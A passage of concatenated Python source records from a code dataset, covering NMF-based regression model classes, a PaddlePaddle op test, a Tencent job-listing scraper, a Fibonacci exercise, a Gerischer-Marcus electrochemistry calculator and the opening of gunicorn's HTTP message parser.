self.TESTparam_grid[\"dt__max_depth\"] = [4]\n\n return\n\n\nclass max_features_is_n_features(NMF_DT):\n def __init__(self, X, y, seed, nmf_max_iter, tol, results_name):\n super().__init__(X, y, seed, nmf_max_iter, tol, results_name)\n return\n\n def set_pipeline(self, nmf__solver, nmf__n_components, nmf__alpha, dt__random_state,\n dt__min_samples_split, dt__max_depth):\n self.pipe = Pipeline([\n (\"nmf\", NMF(init=\"nndsvd\", solver=nmf__solver, max_iter=self.nmf_max_iter,\n tol=self.tol,\n n_components=nmf__n_components, alpha=nmf__alpha,\n verbose=0, random_state=dt__random_state)),\n (\"dt\", DecisionTreeRegressor(random_state=dt__random_state,\n min_samples_split=dt__min_samples_split,\n max_depth=dt__max_depth))])\n\n\nclass max_features_as_param(NMF_DT):\n def __init__(self, X, y, seed, nmf_max_iter, tol, results_name, max_features=[0.3, 0.5, 0.7]):\n super().__init__(X, y, seed, nmf_max_iter, tol, results_name)\n self.results_name = results_name\n self.nmf_max_iter = nmf_max_iter\n self.tol = tol\n\n self.param_grid['dt__max_features'] = max_features\n self.TESTparam_grid['dt__max_features'] = [0.5]\n\n return\n\n def set_pipeline(self, nmf__solver, nmf__n_components, nmf__alpha, dt__random_state,\n dt__min_samples_split, dt__max_depth, dt__max_features):\n self.pipe = Pipeline([\n (\"nmf\", NMF(init=\"nndsvd\", solver=nmf__solver, max_iter=self.nmf_max_iter,\n tol=self.tol,\n n_components=nmf__n_components, alpha=nmf__alpha,\n verbose=0, random_state=dt__random_state)),\n (\"dt\", DecisionTreeRegressor(random_state=dt__random_state,\n min_samples_split=dt__min_samples_split,\n max_depth=dt__max_depth,\n max_features=dt__max_features))])\n return\n\n\nclass NMF_RF(NMF_Model):\n\n def __init__(self, X, y, seed, nmf_max_iter, tol, results_name,\n min_samples_split=[2, 3],\n max_depth=[4, 5],\n max_features=[0.3, 0.5],\n n_estimators=[30, 50]\n ):\n super().__init__(X, y, seed)\n\n self.results_name = results_name\n self.nmf_max_iter = nmf_max_iter\n self.tol = tol\n\n self.param_grid[\"rf__random_state\"] = self.seed\n 
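# extend the NMF grid inherited from NMF_Model with the random-forest hyperparameters\n        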
self.param_grid[\"rf__min_samples_split\"] = min_samples_split\n self.param_grid[\"rf__max_depth\"] = max_depth\n self.param_grid[\"rf__max_features\"] = max_features\n self.param_grid[\"rf__n_estimators\"] = n_estimators\n\n self.TESTparam_grid[\"rf__random_state\"] = self.seed\n self.TESTparam_grid[\"rf__min_samples_split\"] = [3]\n self.TESTparam_grid[\"rf__max_depth\"] = [4]\n self.TESTparam_grid[\"rf__max_features\"] = [0.3]\n self.TESTparam_grid[\"rf__n_estimators\"] = [60]\n\n return\n\n def set_pipeline(self, nmf__solver, nmf__n_components, nmf__alpha, rf__random_state,\n rf__min_samples_split, rf__max_depth, rf__max_features, rf__n_estimators):\n self.pipe = Pipeline([\n (\"nmf\", NMF(init=\"nndsvd\", solver=nmf__solver, max_iter=self.nmf_max_iter,\n tol=self.tol,\n n_components=nmf__n_components, alpha=nmf__alpha,\n verbose=0, random_state=rf__random_state)),\n (\"rf\", RandomForestRegressor(random_state=rf__random_state,\n min_samples_split=rf__min_samples_split,\n max_depth=rf__max_depth,\n max_features=rf__max_features,\n n_estimators=rf__n_estimators))])\n return\n\n\n\n","sub_path":"Model_Classes/NMF_MODEL.py","file_name":"NMF_MODEL.py","file_ext":"py","file_size_in_byte":11755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"179153111","text":"# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport sys\nsys.path.append('..')\n\nfrom program_config import TensorConfig, ProgramConfig, OpConfig, CxxConfig, TargetType, PrecisionType, DataLayoutType, Place\nimport numpy as np\nfrom functools import partial\nfrom typing import Optional, List, Callable, Dict, Any, Set\nimport unittest\nimport hypothesis\nimport hypothesis.strategies as st\n\n\ndef sample_program_configs(draw):\n in_shape = draw(\n st.lists(\n st.integers(\n min_value=2, max_value=6), min_size=4, max_size=4))\n axis_data = draw(st.integers(min_value=0, max_value=3))\n use_stack_data = draw(st.booleans())\n\n def generate_input_I_data():\n return np.random.randint(0, 1, [1]).astype(np.int64)\n\n write_to_array_op = OpConfig(\n type=\"write_to_array\",\n inputs={\"X\": [\"X_data\"],\n \"I\": [\"I_data\"]},\n outputs={\"Out\": [\"middle_data\"]},\n attrs={})\n\n tensor_array_to_tensor_op = OpConfig(\n type=\"tensor_array_to_tensor\",\n inputs={\"X\": [\"middle_data\"]},\n outputs={\"Out\": [\"output_data\"],\n \"OutIndex\": [\"OutIndex_data\"]},\n attrs={\n \"axis\": 1,\n \"use_stack\": False,\n })\n program_config = ProgramConfig(\n ops=[write_to_array_op, tensor_array_to_tensor_op],\n weights={},\n inputs={\n \"X_data\": TensorConfig(shape=in_shape),\n \"I_data\": TensorConfig(data_gen=partial(generate_input_I_data))\n },\n outputs=[\"output_data\", \"OutIndex_data\"])\n return 
program_config\n","sub_path":"lite/tests/unittest_py/op/common/test_tensor_array_to_tensor_op_base.py","file_name":"test_tensor_array_to_tensor_op_base.py","file_ext":"py","file_size_in_byte":2147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"328959840","text":"import requests\r\nfrom lxml import etree\r\n\r\n\r\nheaders = {\r\n    'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36'\r\n}\r\n\r\nBASE_URL = 'https://hr.tencent.com/'\r\n\r\n\r\n# scrape the detail-page url of every job posting\r\ndef get_detail_url():\r\n    keyword = input(\"Enter a job keyword: \")\r\n    pn = input(\"Enter the number of pages to scrape: \")\r\n    urls = []\r\n    for i in range(int(pn)):\r\n        # each result page holds 10 postings, so the page offset is i*10\r\n        url = 'https://hr.tencent.com/position.php?lid=&tid=&keywords={}&start={}#a'.format(keyword,i*10)\r\n        response = requests.get(url,headers=headers).text\r\n        html = etree.HTML(response,parser=etree.HTMLParser())\r\n        detail_urls = html.xpath(\"//table[@class='tablelist']//a/@href\")\r\n        for x in detail_urls:\r\n            url = BASE_URL+x\r\n            urls.append(url)\r\n    return urls\r\n\r\n\r\n# get the details of one job posting\r\ndef parse_detail(url):\r\n    info = {}\r\n    response = requests.get(url,headers=headers).text\r\n    html = etree.HTML(response,parser=etree.HTMLParser())\r\n    title = html.xpath(\"//table[@class='tablelist textl']//tr[@class='h']/td/text()\") # job title\r\n    info['title'] = title\r\n    category_name = html.xpath(\"//table[@class='tablelist textl']//tr[@class='c bottomline']/td/span/text()\")\r\n    category = html.xpath(\"//table[@class='tablelist textl']//tr[@class='c bottomline']/td/text()\") # job category\r\n    for i in range(len(category_name)):\r\n        info[category_name[i]] = category[i]\r\n    job_duties_requires = html.xpath(\"//table[@class='tablelist textl']//tr[@class='c']//div[@class='lightblue']/text()\")\r\n    duty_detail = html.xpath(\"//table[@class='tablelist textl']//tr[@class='c'][position()<2]//ul/li/text()\") # job duties\r\n    require_detail = html.xpath(\"//table[@class='tablelist textl']//tr[@class='c'][position()>1][position()<3]//ul/li/text()\") # job requirements\r\n    info[job_duties_requires[0]] = duty_detail\r\n    info[job_duties_requires[1]] = require_detail\r\n    return info\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n    detail_urls = get_detail_url()\r\n    for url in detail_urls:\r\n        jobs = parse_detail(url)\r\n        print(\"*\"*30)\r\n        for key,values in jobs.items():\r\n            print(key + \":\", end=\"\")\r\n            print(values)\r\n        print(\"*\" * 30)\r\n        print()","sub_path":"tencent.py","file_name":"tencent.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"92126366","text":"def fibonacci(n):\n    \"\"\"\n    Write a function that computes the Fibonacci sequence.\n    The Fibonacci numbers are defined as follows.\n\n    f(n) = 0 if n = 0\n    f(n) = 1 if n = 1\n    f(n) = f(n-1) + f(n-2) if n > 1\n\n    Assume that only integers n >= 0 are given as input.\n    \"\"\"\n\n    if n == 0:\n        return 0\n    elif n == 1:\n        return 1\n\n    # keep the last two Fibonacci numbers and roll them forward\n    prev, result = 0, 1\n    for _ in range(2, n + 1):\n        prev, result = result, prev + result\n\n    return result\n\n\n\n    # if n == 0:\n    #     return 0\n    # elif n == 1:\n    #     return 1\n    # return fibonacci(n - 1) + fibonacci(n - 2)\n\n\nfor i in range(11):\n    print(\"f(%d) = %d\" % (i, fibonacci(i)))\n\n\"\"\" Sample run: \nf(0) = 0\nf(1) = 1\nf(2) = 1\nf(3) = 2\nf(4) = 3\nf(5) = 5\nf(6) = 8\nf(7) = 13\nf(8) = 21\nf(9) = 34\nf(10) = 55\n\"\"\"\n","sub_path":"MJUSchoolClass/CodingTest2/homework1/fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"333761385","text":"import numpy as np\nimport scipy.integrate as integrate\nfrom scipy.optimize import minimize\nimport numbers\nimport typing\nfrom tqdm import tqdm\nfrom echem.core.useful_funcs import nearest_array_index, ClassMethods\nE_F_SHE_VAC = -4.5 # Fermi Energy of Standard Hydrogen Electrode with respect to vacuum\n\n\nclass GM(ClassMethods):\n    \"\"\"This class calculates the final Fermi and Redox species distributions according\n    to the Gerischer-Marcus formalism.\n\n    Parameters:\n    -----------\n    DOS: np.ndarray, optional\n        The values of DOS in 1D numpy array. If not specified values will be taken from saved data.\n\n    E: np.ndarray, optional\n        The energy mesh corresponding to the DOS. If not specified values will be taken from saved data.\n\n    efermi: np.ndarray, optional\n        System Fermi level. If not specified values will be taken from saved data.\n\n    vacuum_lvl: np.ndarray, optional\n        System vacuum level. If not specified values will be taken from saved data.\n    \"\"\"\n    def __init__(self, path_to_data='Saved_data', DOS=None, E=None, efermi=None, vacuum_lvl=None):\n        # variables that might be defined through __init__ function\n        self.E = E\n        self.DOS = DOS\n        self.efermi = efermi\n        self.vacuum_lvl = vacuum_lvl\n\n        # variables that should be defined through set_params function\n        self.C_EDL = None\n        self.T = None\n        self.l = None\n        self.sheet_area = None\n\n        # variables that will be created during calculations\n        self.sigma_Q_arr = None\n\n        # variables that define numerical parameters of quantum charge calculation\n        self.__SIGMA_0 = 0.5\n        self.__SIGMA_ACCURACY = 1e-3\n        self.__SIGMA_RANGE = 4\n\n        if DOS is None:\n            try:\n                self.DOS = np.load(path_to_data + '/DOS.npy')\n            except OSError:\n                print('File DOS.npy does not exist')\n\n        if E is None:\n            try:\n                self.E = np.load(path_to_data + '/E.npy')\n            except OSError:\n                print('File E_DOS.npy does not exist')\n\n        if efermi is None:\n            try:\n                self.efermi = np.load(path_to_data + '/efermi.npy')\n            except OSError:\n                print('File efermi.npy does not exist')\n\n        if vacuum_lvl is None:\n            try:\n                self.vacuum_lvl = np.load(path_to_data + '/vacuum_lvl.npy')\n            except OSError:\n                print('File vacuum_lvl.npy does not exist')\n\n    def set_params(self, C_EDL, T, l, sheet_area):\n        \"\"\"Sets parameters of calculation\n\n        Parameters:\n        ----------\n        C_EDL: float, str\n            float: Capacitance of electric double layer (microF/cm^2)\n            str: 'Q' calculating in the Quantum Capacitance Dominating limit (C_Q << C_EDL)\n            str: 'Cl' calculating in the Classical limit (C_Q >> C_EDL)\n\n        T: int, float\n            Temperature. 
It is used in computing Fermi function and distribution function of redox system states\n\n l: float\n Reorganization energy in eV\n \"\"\"\n self.C_EDL = C_EDL\n self.T = T\n self.l = l\n\n self.sheet_area = sheet_area\n\n def set_params_advance(self, SIGMA_0=0.5, ACCURACY_SIGMA=1e-3, SIGMA_RANGE=4):\n \"\"\"\n Sets numerical parameters that are used in quantum charge density calculations. Delete cashed\n results of charge calculations.\n Args:\n SIGMA_0: float, optional\n Initial guess for charge at equilibrium\n ACCURACY_SIGMA: float, optional\n Accuracy of charge calculation\n SIGMA_RANGE: float, optional\n It defines the minimum and maximum calculated charge\n \"\"\"\n self.__SIGMA_0 = SIGMA_0\n self.__SIGMA_ACCURACY = ACCURACY_SIGMA\n self.__SIGMA_RANGE = SIGMA_RANGE\n self.sigma_Q_arr = None\n\n @staticmethod\n def fermi_func(E, T):\n \"\"\"\n Calculates Fermi-Dirac Distribution\n Args:\n E: Energies\n T: Temperature in K\n \"\"\"\n k = 8.617e-5 # eV/K\n return 1 / (1 + np.exp(E / (k * T)))\n\n @staticmethod\n def W_ox(E, T, l):\n \"\"\"\n Distribution of oxidized states\n Args:\n E (np.array): Energies\n T (float): Temperature\n l (float): Reorganization energy\n \"\"\"\n k = 8.617e-5 # eV/K\n W_0 = (1 / np.sqrt(4 * k * T * l))\n return W_0 * np.exp(- (E - l) ** 2 / (4 * k * T * l))\n\n @staticmethod\n def W_red(E, T, l):\n \"\"\"\n Distribution of reduced states\n Args:\n E (np.array): Energies\n T (float): Temperature\n l (float): Reorganization energy\n \"\"\"\n k = 8.617e-5 # eV/K\n W_0 = (1 / np.sqrt(4 * k * T * l))\n return W_0 * np.exp(- (E + l) ** 2 / (4 * k * T * l))\n\n def compute_C_quantum(self, dE_Q_arr):\n \"\"\"\n Calculates differential quantum capacitance\n Q = e * int{DOS(E) * [f(E) - f(E + deltaE)] dE}\n C_Q = - dQ/d(deltaE) = - (e / (4*k*T)) * int{DOS(E) * sech^2[(E+deltaE)/(2*k*T)] dE}\n Args:\n dE_Q_arr (np.array, float): Energy shift at which C_Q is calculated\n Returns:\n Quantum capacitance in accordance with energy displacement(s)\n TODO check constants\n \"\"\"\n self.check_existence('T')\n self.check_existence('sheet_area')\n\n k = 8.617e-5 # eV/K\n\n elementary_charge = 1.6e-19 # C\n k_1 = 1.38e-23 # J/K\n const = (1e6 * elementary_charge ** 2) / (4 * k_1 * self.sheet_area) # micro F / cm^2\n\n if isinstance(dE_Q_arr, typing.Iterable):\n\n C_q_arr = np.zeros_like(dE_Q_arr)\n\n for i, dE_Q in enumerate(dE_Q_arr):\n E_2 = self.E - dE_Q # energy range for cosh function\n cosh = np.cosh(E_2 / (2 * k * self.T))\n integrand = (self.DOS / cosh) / cosh\n C_q = (const / self.T) * integrate.simps(integrand, self.E)\n C_q_arr[i] = C_q\n\n return C_q_arr\n\n def compute_C_total(self, E_diff_arr, add_info=False):\n\n sigma_arr = np.zeros_like(E_diff_arr)\n for i, E_diff in tqdm(enumerate(E_diff_arr), total=len(E_diff_arr)):\n sigma_arr[i] = self.compute_sigma(E_diff, sigma_0=sigma_arr[i-1])\n\n C_tot_arr = np.zeros_like(E_diff_arr)\n C_Q_arr = np.zeros_like(E_diff_arr)\n\n for i, (E_diff, sigma) in enumerate(zip(E_diff_arr, sigma_arr)):\n ind = nearest_array_index(self.sigma_Q_arr, sigma)\n E_step = self.__SIGMA_ACCURACY\n E_start = - self.__SIGMA_RANGE\n dE_Q = E_start + E_step * ind\n C_Q = self.compute_C_quantum([dE_Q])\n C_Q_arr[i] = C_Q[0]\n C_tot = C_Q * self.C_EDL / (C_Q + self.C_EDL)\n C_tot_arr[i] = C_tot\n\n if add_info is False:\n return C_tot_arr\n else:\n return C_tot_arr, C_Q_arr, sigma_arr\n\n def compute_sigma_EDL(self, dE_EDL):\n \"\"\"\n Calculates charge corresponding to the potential drop of -dE_EDL/|e|.\n Takes into account integral capacitance 
C_EDL\n Args:\n dE_EDL (float, np.array): Electron energy shift due to potential drop\n Returns:\n Charge or Sequence of charges\n \"\"\"\n self.check_existence('C_EDL')\n return - self.C_EDL * dE_EDL\n\n def compute_sigma_quantum(self, dE_Q_arr):\n \"\"\"\n Computes surface charge density induced by depletion or excess of electrons\n\n Parameters:\n ----------\n dE_Q_arr: np.ndarray, float\n Shift in Fermi level due to quantum capacitance\n\n Returns:\n -------\n sigmas: np.ndarray, float\n Computed values (or one value) of surface charge densities\n \"\"\"\n\n self.check_existence('T')\n self.check_existence('sheet_area')\n\n elementary_charge = 1.6e-13 # micro coulomb\n\n if isinstance(dE_Q_arr, typing.Iterable):\n y_fermi = self.fermi_func(self.E, self.T)\n\n sigmas = []\n\n for dE_Q in dE_Q_arr:\n E_2 = self.E - dE_Q # energy range for shifted Fermi_Dirac function\n y_fermi_shifted = self.fermi_func(E_2, self.T)\n integrand = self.DOS * (y_fermi - y_fermi_shifted)\n sigma = (elementary_charge / self.sheet_area) * integrate.simps(integrand, self.E)\n sigmas.append(sigma)\n\n return sigmas\n\n elif isinstance(dE_Q_arr, numbers.Real):\n y_fermi = self.fermi_func(self.E, self.T)\n\n E_2 = self.E - dE_Q_arr # energy range for shifted Fermi_Dirac function\n y_fermi_shifted = self.fermi_func(E_2, self.T)\n integrand = self.DOS * (y_fermi - y_fermi_shifted)\n sigma = (elementary_charge / self.sheet_area) * integrate.simps(integrand, self.E)\n\n return sigma\n else:\n raise TypeError(f'Invalid type of dE_Q_arr: {type(dE_Q_arr)}')\n\n def compute_sigma(self, E_diff, sigma_0=None):\n\n def error_E_diff(sigma, E_diff, sigma_Q_arr):\n ind = nearest_array_index(sigma_Q_arr, sigma)\n dE_Q = E_start + E_step * ind\n dE_EDL = - sigma / self.C_EDL\n dE_total = dE_Q + dE_EDL\n\n return (dE_total - E_diff) ** 2\n\n for var in ['T', 'l', 'C_EDL']:\n self.check_existence(var)\n\n E_step = self.__SIGMA_ACCURACY\n E_start = - self.__SIGMA_RANGE\n if sigma_0 is None:\n sigma_0 = self.__SIGMA_0\n # check if we've already calculated sigma_Q_arr in another run\n if self.sigma_Q_arr is None:\n E_range = np.arange(E_start, -E_start, E_step)\n sigma_Q_arr = self.compute_sigma_quantum(E_range)\n self.sigma_Q_arr = sigma_Q_arr\n else:\n sigma_Q_arr = self.sigma_Q_arr\n\n result = minimize(error_E_diff, np.array([sigma_0]), args=(E_diff, sigma_Q_arr))\n sigma = result.x[0]\n\n return sigma\n\n def compute_distributions(self, V_std, overpot=0, reverse=False, add_info=False):\n \"\"\"Computes Fermi-Dirac and Redox species distributions according to Gerischer-Markus formalism\n with Quantum Capacitance\n\n Parameters:\n ----------\n V_std: float\n Standard potential (vs SHE) of a redox couple (Volts)\n overpot: float, optional\n Overpotential (Volts). 
It shifts the electrode Fermi energy to -|e|*overpot\n reverse: bool, optional\n If reverse is False the process of electron transfer from electrode to the oxidized state of the\n redox species is considered and vice versa\n add_info: bool, optional\n If False the func returns Fermi-Dirac and Redox species distributions\n If True additionally returns dE_Q (Fermi energy shift due to the quantum capacitance),\n sigma (surface charge) and E_diff (the whole energy shift with respect to the original Fermi level)\n\n Returns:\n -------\n y_fermi: np.array\n Fermi-Dirac distribution\n y_redox: np.array\n Redox species distributions\n dE_Q: np.array, optional (if add_info == True)\n Total shift of the Fermi energy due to the Quantum Capacitance\n sigma: np.array, optional (if add_info == True)\n surface charge in microF/cm^2\n E_F_redox: np.array, optional (if add_info == True)\n The sum of two energy displacement of the electrode due to the difference in Fermi level of Redox couple\n and the electrode and overpotential. It splits into dE_Q and dE_EDL\n \"\"\"\n\n E_F_redox = E_F_SHE_VAC - self.efermi - V_std + self.vacuum_lvl - overpot\n sigma = self.compute_sigma(E_F_redox)\n\n ind = nearest_array_index(self.sigma_Q_arr, sigma)\n E_step = self.__SIGMA_ACCURACY\n E_start = - self.__SIGMA_RANGE\n dE_Q = E_start + E_step * ind\n\n E_fermi = self.E - dE_Q\n E_DOS_redox = self.E - dE_Q - overpot\n\n if reverse:\n y_fermi = 1 - self.fermi_func(E_fermi, self.T)\n y_redox = self.W_red(E_DOS_redox, self.T, self.l)\n else:\n y_fermi = self.fermi_func(E_fermi, self.T)\n y_redox = self.W_ox(E_DOS_redox, self.T, self.l)\n\n if not add_info:\n return y_fermi, y_redox\n else:\n return y_fermi, y_redox, dE_Q, sigma, E_F_redox\n\n def compute_k_HET(self, V_std_pot_arr, overpot_arr, reverse=False, add_info=False):\n \"\"\"Computes integral k_HET using Gerischer-Markus formalism with quantum capacitance\n\n Parameters:\n ----------\n V_std_pot_arr: float, np.ndarray\n A range of varying a standard potential\n overpot_arr: float, np.ndarray\n A range of varying an overpotential\n reverse: bool, optional\n if reverse is False the process of electron transfer from electrode to the oxidized state of the\n redox mediator is considered and vice versa\n\n Returns:\n -------\n k_HET: np.array\n Calculated heterogeneous electron transfer rate constant according to Gerischer-Marcus model with quantum\n capacitance\n dE_Q_arr: np.ndarray, optional (if add_info == True)\n Total shift of the Fermi energy due to the Quantum Capacitance for all calculated redox potentials or\n overpotentials\n sigma_arr: np.ndarray, optional (if add_info == True)\n surface charge in microF/cm^2 for all calculated redox potentials or overpotentials\n E_F_redox_arr: np.ndarray, optional (if add_info == True)\n The sum of two energy displacement of the electrode due to the difference in Fermi level of Redox couple\n and the electrode and overpotential. It splits into dE_Q and dE_EDL. 
For all calculated redox potentials\n or overpotentials\n y_fermi_arr: 2D np.ndarray, optional (if add_info == True)\n Fermi-Dirac distribution for all calculated redox potentials or overpotentials\n y_redox_arr: 2D np.ndarray, optional (if add_info == True)\n Redox species distributions for all calculated redox potentials or overpotentials\n \"\"\"\n\n if isinstance(self.C_EDL, numbers.Real):\n if isinstance(V_std_pot_arr, typing.Iterable) and isinstance(overpot_arr, numbers.Real):\n k_HET = np.zeros_like(V_std_pot_arr)\n if not add_info:\n for i, V_std in tqdm(enumerate(V_std_pot_arr), total=len(V_std_pot_arr)):\n y_fermi, y_redox = self.compute_distributions(V_std, reverse=reverse, overpot=overpot_arr)\n integrand = self.DOS * y_fermi * y_redox\n k_HET[i] = integrate.simps(integrand, self.E) / self.sheet_area\n return k_HET\n else:\n dE_Q_arr = np.zeros_like(V_std_pot_arr)\n sigma_arr = np.zeros_like(V_std_pot_arr)\n E_F_redox_arr = np.zeros_like(V_std_pot_arr)\n y_fermi_arr = np.zeros((len(V_std_pot_arr), len(self.E)))\n y_redox_arr = np.zeros((len(V_std_pot_arr), len(self.E)))\n for i, V_std in tqdm(enumerate(V_std_pot_arr), total=len(V_std_pot_arr)):\n y_fermi, y_redox, dE_Q, sigma, E_F_redox = self.compute_distributions(V_std, reverse=reverse,\n overpot=overpot_arr,\n add_info=add_info)\n integrand = self.DOS * y_fermi * y_redox\n k_HET[i] = integrate.simps(integrand, self.E) / self.sheet_area\n dE_Q_arr[i] = dE_Q\n sigma_arr[i] = sigma\n E_F_redox_arr[i] = E_F_redox\n y_fermi_arr[i] = y_fermi\n y_redox_arr[i] = y_redox\n return k_HET, dE_Q_arr, sigma_arr, E_F_redox_arr, y_fermi_arr, y_redox_arr\n\n elif isinstance(overpot_arr, typing.Iterable) and isinstance(V_std_pot_arr, numbers.Real):\n k_HET = np.zeros_like(overpot_arr)\n if not add_info:\n for i, overpot in tqdm(enumerate(overpot_arr), total=len(overpot_arr)):\n y_fermi, y_redox = self.compute_distributions(V_std_pot_arr, reverse=reverse, overpot=overpot)\n integrand = self.DOS * y_fermi * y_redox\n k_HET[i] = integrate.simps(integrand, self.E) / self.sheet_area\n\n return k_HET\n else:\n dE_Q_arr = np.zeros_like(overpot_arr)\n sigma_arr = np.zeros_like(overpot_arr)\n E_F_redox_arr = np.zeros_like(overpot_arr)\n y_fermi_arr = np.zeros((len(overpot_arr), len(self.E)))\n y_redox_arr = np.zeros((len(overpot_arr), len(self.E)))\n for i, overpot in tqdm(enumerate(overpot_arr), total=len(overpot_arr)):\n y_fermi, y_redox, dE_Q, sigma, E_F_redox = self.compute_distributions(V_std_pot_arr,\n reverse=reverse,\n overpot=overpot,\n add_info=add_info)\n integrand = self.DOS * y_fermi * y_redox\n k_HET[i] = integrate.simps(integrand, self.E) / self.sheet_area\n dE_Q_arr[i] = dE_Q\n sigma_arr[i] = sigma\n E_F_redox_arr[i] = E_F_redox\n y_fermi_arr[i] = y_fermi\n y_redox_arr[i] = y_redox\n return k_HET, dE_Q_arr, sigma_arr, E_F_redox_arr, y_fermi_arr, y_redox_arr\n\n else:\n raise ValueError('One and only one type of V_std_pot_arr and overpot arr must be Sequence. 
The other \\\n must be a Real number')\n\n elif self.C_EDL == 'Cl':\n if isinstance(V_std_pot_arr, typing.Iterable) and isinstance(overpot_arr, numbers.Real):\n E_fermi = self.E\n E_DOS_redox = self.E - overpot_arr\n\n if reverse:\n y_fermi = 1 - self.fermi_func(E_fermi, self.T)\n y_redox = self.W_red(E_DOS_redox, self.T, self.l)\n else:\n y_fermi = self.fermi_func(E_fermi, self.T)\n y_redox = self.W_ox(E_DOS_redox, self.T, self.l)\n\n integrand = self.DOS * y_fermi * y_redox\n k_HET = np.ones_like(V_std_pot_arr) * integrate.simps(integrand, self.E)\n\n return k_HET\n\n elif isinstance(overpot_arr, typing.Sequence) and isinstance(V_std_pot_arr, numbers.Real):\n k_HET = np.zeros_like(overpot_arr)\n\n for i, overpot in tqdm(enumerate(overpot_arr), total=len(overpot_arr)):\n E_fermi = self.E\n E_DOS_redox = self.E - overpot\n\n if reverse:\n y_fermi = 1 - self.fermi_func(E_fermi, self.T)\n y_redox = self.W_red(E_DOS_redox, self.T, self.l)\n else:\n y_fermi = self.fermi_func(E_fermi, self.T)\n y_redox = self.W_ox(E_DOS_redox, self.T, self.l)\n\n integrand = self.DOS * y_fermi * y_redox\n k_HET[i] = integrate.simps(integrand, self.E)\n\n return k_HET\n\n else:\n raise ValueError('One and only one type of V_std_pot_arr and overpot arr must be Sequence. The other \\\n must be Real number')\n\n elif self.C_EDL == 'Q':\n if isinstance(V_std_pot_arr, typing.Iterable) and isinstance(overpot_arr, numbers.Real):\n k_HET = np.zeros_like(V_std_pot_arr)\n\n for i, V_std in tqdm(enumerate(V_std_pot_arr), total=len(V_std_pot_arr)):\n E_F_redox = E_F_SHE_VAC - self.efermi - V_std + self.vacuum_lvl\n E_DOS_redox = self.E - E_F_redox\n E_fermi = E_DOS_redox - overpot_arr\n\n if reverse:\n y_fermi = 1 - self.fermi_func(E_fermi, self.T)\n y_redox = self.W_red(E_DOS_redox, self.T, self.l)\n else:\n y_fermi = self.fermi_func(E_fermi, self.T)\n y_redox = self.W_ox(E_DOS_redox, self.T, self.l)\n\n integrand = self.DOS * y_fermi * y_redox\n k_HET[i] = integrate.simps(integrand, self.E)\n\n return k_HET\n\n elif isinstance(overpot_arr, typing.Iterable) and isinstance(V_std_pot_arr, numbers.Real):\n k_HET = np.zeros_like(overpot_arr)\n\n for i, overpot in tqdm(enumerate(overpot_arr), total=len(overpot_arr)):\n E_F_redox = E_F_SHE_VAC - self.efermi - V_std_pot_arr + self.vacuum_lvl - overpot\n E_fermi = self.E - E_F_redox\n E_DOS_redox = self.E - E_F_redox - overpot\n\n if reverse:\n y_fermi = 1 - self.fermi_func(E_fermi, self.T)\n y_redox = self.W_red(E_DOS_redox, self.T, self.l)\n else:\n y_fermi = self.fermi_func(E_fermi, self.T)\n y_redox = self.W_ox(E_DOS_redox, self.T, self.l)\n\n integrand = self.DOS * y_fermi * y_redox\n k_HET[i] = integrate.simps(integrand, self.E)\n\n return k_HET\n\n else:\n raise ValueError('One and only one type of V_std_pot_arr and overpot arr must be Sequence. The other \\\n must be Real number')\n","sub_path":"echem/eltransfer/GerischerMarkus.py","file_name":"GerischerMarkus.py","file_ext":"py","file_size_in_byte":22332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"428428631","text":"# -*- coding: utf-8 -\n#\n# This file is part of gunicorn released under the MIT license. 
\n# See the NOTICE for more information.\n\nimport re\nimport urlparse\n\ntry:\n from cStringIO import StringIO\nexcept ImportError:\n from StringIO import StringIO\n\nfrom gunicorn.http.body import ChunkedReader, LengthReader, EOFReader, Body\nfrom gunicorn.http.errors import InvalidHeader, InvalidHeaderName, NoMoreData, \\\nInvalidRequestLine, InvalidRequestMethod, InvalidHTTPVersion\n\nclass Message(object):\n def __init__(self, unreader):\n self.unreader = unreader\n self.version = None\n self.headers = []\n self.trailers = []\n self.body = None\n\n self.hdrre = re.compile(\"[\\x00-\\x1F\\x7F()<>@,;:\\[\\]={} \\t\\\\\\\\\\\"]\")\n\n unused = self.parse(self.unreader)\n self.unreader.unread(unused)\n self.set_body_reader()\n \n def parse(self):\n raise NotImplementedError()\n\n def parse_headers(self, data):\n headers = []\n\n # Split lines on \\r\\n keeping the \\r\\n on each line\n lines = [line + \"\\r\\n\" for line in data.split(\"\\r\\n\")]\n\n # Parse headers into key/value pairs paying attention\n # to continuation lines.\n while len(lines):\n # Parse initial header name : value pair.\n curr = lines.pop(0)\n if curr.find(\":\") < 0:\n raise InvalidHeader(curr.strip())\n name, value = curr.split(\":\", 1)\n name = name.rstrip(\" \\t\").upper()\n if self.hdrre.search(name):\n raise InvalidHeaderName(name)\n name, value = name.strip(), [value.lstrip()]\n \n # Consume value continuation lines\n while len(lines) and lines[0].startswith((\" \", \"\\t\")):\n value.append(lines.pop(0))\n value = ''.join(value).rstrip()\n \n headers.append((name, value))\n return headers\n\n def set_body_reader(self):\n chunked = False\n response_length = None\n for (name, value) in self.headers:\n if name == \"CONTENT-LENGTH\":\n try:\n response_length = int(value)\n except ValueError:\n response_length = None\n elif name == \"TRANSFER-ENCODING\":\n chunked = value.lower() == \"chunked\"\n elif name == \"SEC-WEBSOCKET-KEY1\":\n response_length = 8\n\n if response_length is not None or chunked:\n break\n\n if chunked:\n self.body = 